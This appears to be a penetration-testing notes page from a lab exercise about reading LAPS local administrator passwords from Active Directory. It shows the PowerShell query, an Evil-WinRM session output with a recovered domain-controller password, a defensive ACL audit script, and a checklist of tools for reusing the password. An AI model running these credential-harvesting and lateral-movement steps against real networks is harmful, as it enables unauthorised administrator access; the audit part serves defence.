# LAPS Password Read

To read LAPS passwords, we run the following command in PowerShell.

```
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
```

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2Fn6Y9Iy5VnCh6kXNWkeim%2F2022-07-27_23-54.png?alt=media\&token=3b0bdcc8-7859-4b7b-953b-2d38cf2952cb)

Notice in the output how the password is contained within ms-Mcs-AdmPwd.

```
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}


PSComputerName              : localhost
RunspaceId                  : ae9923c4-551b-480e-aebd-e19931fe811a
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : 8p4Uc,AC5lJ9E]P9X7#3$10@
ms-Mcs-AdmPwdExpirationTime : 132951514281823553
Name                        : DC01
ObjectClass                 : computer
ObjectGUID                  : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName              : DC01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName           :
```
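
Whether the query above returns a value in `ms-Mcs-AdmPwd` depends on the caller's rights on each computer object. The following added example (not part of the original notes) lists the principals whose ACL entries allow reading that attribute, so the delegation can be compared with what was intended. It assumes the ActiveDirectory module and the legacy LAPS schema attribute shown above.

```powershell
# Added example: audit which principals can read ms-Mcs-AdmPwd.
# Assumes the RSAT ActiveDirectory module and the legacy LAPS schema extension.
Import-Module ActiveDirectory

# Look up the attribute's schemaIDGUID in this forest instead of hard-coding it.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$attr     = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(name=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
$pwdGuid  = [guid]$attr.schemaIDGUID
$anyGuid  = [guid]::Empty   # an ACE with an empty ObjectType applies to all attributes

# ms-Mcs-AdmPwd is a confidential attribute: reading it needs ReadProperty
# together with control access (ExtendedRight). GenericAll includes both bits.
$read = [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty
$ctrl = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

Get-ADComputer -Filter * | ForEach-Object {
    $computer = $_
    (Get-Acl -Path "AD:\$($computer.DistinguishedName)").Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ($_.ObjectType -eq $pwdGuid -or $_.ObjectType -eq $anyGuid) -and
            ($_.ActiveDirectoryRights -band $read) -and
            ($_.ActiveDirectoryRights -band $ctrl)
        } |
        Select-Object @{n = 'Computer'; e = { $computer.Name }},
                      IdentityReference, ActiveDirectoryRights, IsInherited
} | Sort-Object Computer, IdentityReference | Format-Table -AutoSize
```

Any identity in the result other than the intended LAPS reader groups and built-in administrators is a delegation to review.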

Now we try the recovered password with each of the following:

* [ ] psexec
* [ ] evilwinrm
* [ ] psremoting
* [ ] runas
* [ ] cme
